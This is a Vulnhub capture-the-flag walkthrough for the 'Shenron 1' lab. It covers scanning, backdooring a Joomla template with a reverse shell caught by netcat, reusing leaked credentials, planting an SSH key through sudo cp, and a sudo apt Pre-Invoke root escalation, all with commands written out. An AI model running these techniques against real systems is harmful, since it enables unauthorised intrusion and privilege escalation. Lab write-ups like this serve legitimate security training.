Shenron 1 Vulnhub Walkthrough

Initial Enumeration

I started the initial reconnaissance by running a port scan with nmap looking for open ports and running services.

madhav@anton:~/ctf/vulnhub/shenron1▸ nmap -sC -sV -oN nmap/initial 192.168.1.114
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-04 22:16 IST
Nmap scan report for 192.168.1.114
Host is up (0.00030s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.39 seconds

We have only two ports open. I started the enumeration with port 80 first. So let's open our web browser and see what's running on port 80.

We only have the Apache2 default page. Next, I performed a gobuster scan to look for hidden files and directories.

madhav@anton:~/ctf/vulnhub/shenron1▸ gobuster dir -u http://192.168.1.114 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .html,.php -o gobuster.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.114
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
2021/05/04 22:32:27 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/test                 (Status: 301) [Size: 313] [--> http://192.168.1.114/test/]
/joomla               (Status: 301) [Size: 315] [--> http://192.168.1.114/joomla/]
/server-status        (Status: 403) [Size: 278]                                   
                                                                                  
===============================================================
2021/05/04 22:35:58 Finished
===============================================================

We have two interesting directories. Inside the test directory, there was a file named password which says:

And actually we are very near, when we look at the source code of the page, we get a username and a password.

I tried using this username and password to login via SSH but that did not work. So next I enumerated the other directory  i.e. /joomla.

As the name suggests, the website is running Joomla which is a CMS similar to Wordpress.

Like other content management systems, this also has a login panel which can be accessed from http://IP/joomla/administrator/.

We can login into the Joomla Dashboard using the credentials we found earlier.

Our next step is to get a reverse shell into the system. We can do this by modifying the source code of a template written in php to a malicious page which will execute our reverse shell code.

For this navigate to Configuration > Templates > Templates >  Protostar Details and Files > index.php

Alternatively, you can visit the following URL. Replace the IP with the IP address of your machine.

http://IP/joomla/administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA

Now, change the source code of index.php with the code for reverse shell. I will be using the php-reverse-shell by pentestmonkey.

Now, save the template using the save button. Then start a netcat listener and visit the URL - http://IP/joomla and the reverse shell will be executed.

madhav@anton:~/ctf/vulnhub/shenron1▸ nc -lvnp 9001
Listening on 0.0.0.0 9001
Connection received on 192.168.1.114 58914
Linux shenron 5.4.0-58-generic #64-Ubuntu SMP Wed Dec 9 08:16:25 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 22:11:29 up  5:17,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Now I upgraded this shell into a fully interactive TTY using the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
reset
Ctrl+D
export TERM=xterm-256color
stty rows 42
stty columns 149

Next, I checked the home directory and found two users named jenny and shenron but we do not have access to their home directories.

I found a password.txt in /var/opt/ directory but it is only readable by user shenron.

Next I checked the /var/www/html/joomla folder and found some credentials in the configuration.php.

Using these credentials, we can login as user jenny using the following command:

www-data@shenron:/var/www/html/joomla$ su jenny
Password: 
jenny@shenron:/var/www/html/joomla$ cd
jenny@shenron:~$

Next, I used the sudo -l command to see if we can run any command as user root and found that user jenny can run /usr/bin/cp as user shenron.

jenny@shenron:~$ sudo -l
Matching Defaults entries for jenny on shenron:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jenny may run the following commands on shenron:
    (shenron) NOPASSWD: /usr/bin/cp

So to gain a shell as user shenron we can copy our id_rsa.pub to the .ssh directory of user shenron so that we can login as user shenron via SSH.

First of all we need to generate a SSH key using the command ssh-keygen. You can choose any password you want. I will leave it empty.

enny@shenron:~$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/jenny/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/jenny/.ssh/id_rsa
Your public key has been saved in /home/jenny/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:o8O9+IRH9ytRl+V+2DfNFg37wrijlYSYJM+pzgZ8cJY jenny@shenron
The key's randomart image is:
+---[RSA 3072]----+
|                 |
|              . .|
|      ...      *.|
|    . E= + .. +.o|
|   . +  S o..+ *o|
|    o..* o.o..+.X|
|     o* +  .+. o+|
|     o.= ...o.   |
|     .+.o .o..   |
+----[SHA256]-----+

Next if we visit /home/jenny/.ssh we will see two new files named id_rsa and id_rsa.pub.

Now we need to copy the id_rsa.pub to /tmp directory so that we can copy it to the home directory of user shenron. Also we need to rename it as authorized_keys so that it can be recognized by SSH.

jenny@shenron:~/.ssh$ cat id_rsa.pub > /tmp/authorized_keys
jenny@shenron:~/.ssh$ cd /tmp/
jenny@shenron:/tmp$ ls
authorized_keys
jenny@shenron:/tmp$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDajtCZPM/hHgWxyOvB5DHi88k/oymLJLLmid9YMsYrqkG+QxFYyvzcCKDoBGvnaUqDsJ9FAkv3ZojUDdzl+TyUN2foOHltgfl1RhyDZ+MVGOxtOdvnrs4diFoEjvO/6H96cEabCuCAPMJmIgonVcLQyIAnecyaTRCkHeY/GrnAwFK78sXM1Y3jI6TBYjlRxMyKXqy/FwiLQPj6AzsEcZdAq8ROeq1nmkUK/AFXL9K1sMq171zzBtWwroDAtm7kO23qrmpFJLHhB3p22EbaHR0AZ15ESeRmq2w9zPXlcOpGzvJWhVI4TOnI5LyiaURgPERliiM5KfO+8M49/FS00tFLjwkFVytECtXRULI1injuSUttfov0iOudfF3n70/JEs7DOyzE9V09OACdv8LI5CYlrUMgVjvhwzQWy5FUDy2AUDO1j4kvNhYlLX4hPPW5uR6EIDeWRAjFHlNPQC1CJzThDlmvMd+QrmuJ9T86e+h7UvM2TGYFkGZCdFBi+Z/MWrE= jenny@shenron

Now we can copy it to /home/shenron/.ssh by using /usr/bin/cp with sudo using the following command:

jenny@shenron:/tmp$ sudo -u shenron /usr/bin/cp /tmp/authorized_keys /home/shenron/.ssh/

Once the command is executed successfully, we can login as user shenron using the following command:

jenny@shenron:/tmp$ ssh shenron@localhost
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:g7OH7xlX0hIadHAVMFKlrgpzBsNc90HPNtVjbGnebhQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sun Dec 13 17:52:12 2020 from 127.0.0.1
shenron@shenron:~$

We can now read our first flag present in the home directory of user shenron.

shenron@shenron:~$ ls
local.txt
shenron@shenron:~$ cat local.txt 
098bf43cc909e1f89bb4c910bd31e1d4

Now we can read the password.txt we found earlier.

shenron@shenron:~$ cat /var/opt/password.txt 
shenron : YoUkNowMyPaSsWoRdIsToStRoNgDeAr

shenron@shenron:~$

We got the password for user shenron. Next I ran the sudo -l command and found that user shenron can run /usr/bin/apt as root.

shenron@shenron:~$ sudo -l
[sudo] password for shenron: 
Matching Defaults entries for shenron on shenron:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shenron may run the following commands on shenron:
    (ALL : ALL) /usr/bin/apt

After searching on GTFO Bins, I found that we can exploit this to get a root shell using the following command:

TF=$(mktemp)
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
sudo apt install -c $TF sl

Hurray! we are root and now we can read our final flag present in the root directory.

root@shenron:~# cat root.txt 
                                                               
  mmmm  #                                                mmm   
 #"   " # mm    mmm   m mm    m mm   mmm   m mm            #   
 "#mmm  #"  #  #"  #  #"  #   #"  " #" "#  #"  #           #   
     "# #   #  #""""  #   #   #     #   #  #   #   """     #   
 "mmm#" #   #  "#mm"  #   #   #     "#m#"  #   #         mm#mm 
                                                               
Your Root Flag Is Here :- aa087b2d466cd593622798c8e972bffb



If You Like This Machine Follow Me On Twitter..
Twitter Handle:-    https://twitter.com/shubhammandloi or @shubhammandloi

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Christi du Toit.